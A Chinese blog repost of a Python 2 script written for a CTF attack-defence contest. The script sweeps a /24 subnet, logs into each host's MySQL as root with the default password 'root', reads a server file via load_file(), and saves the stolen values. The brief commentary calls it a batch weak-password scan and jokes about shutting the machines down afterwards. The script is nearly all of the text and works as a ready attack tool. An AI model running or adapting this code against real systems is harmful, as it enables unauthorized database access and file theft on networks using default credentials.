当前位置 : 主页 > 编程语言 > python >

CTF比赛中使用Python通过Mysql漏洞获取FLAG

来源:互联网 收集:自由互联 发布时间:2022-06-18
#!/usr/bin/env python import MySQLdb def Mysql_Inject ( ip , flag ): db = MySQLdb . connect ( "127.0.0.1" , "root" , "123456" , "python" ) cursor = db . cursor () try : query = "insert into py values(\"%s\",\"%s\");" % ( ip , flag ) cursor


#!/usr/bin/env python
import MySQLdb

def Mysql_Inject(ip,flag):
db = MySQLdb.connect("127.0.0.1","root","123456","python")
cursor = db.cursor()
try:
query = "insert into py values(\"%s\",\"%s\");"%(ip,flag)
cursor.execute(query)
db.commit()
except:
print "save error!"
db.rollback()
db.close()

def MySQL_Connect(ip):
try:
db = MySQLdb.connect(ip,"root","root","mysql")
cursor = db.cursor()
except:
pass
try:
cursor.execute("select load_file('/flagvalue.txt');")
result = cursor.fetchall()
for row in result:
ip = ip
flag = result[0][0]
db.close()
Mysql_Inject(ip,flag)
print "get %s flag!"%ip
except:
pass

for i in range(1,254):
ip = '192.168.1.%s'%i
MySQL_Connect(ip)

这里也不能算是漏洞,算是批量扫描一下弱密码。

不过密码都不改那肯定是通过脚本批量拿了,拿完关机美滋滋,比赛中速度才是胜利的第一要义。

尽管metasploit中也有很多mysql爆破的脚本,但是可定制性太差,还是要自己写一套。



上一篇:使用Python实现路由追踪脚本
下一篇:没有了
网友评论
相关栏目
最近更新
热门文章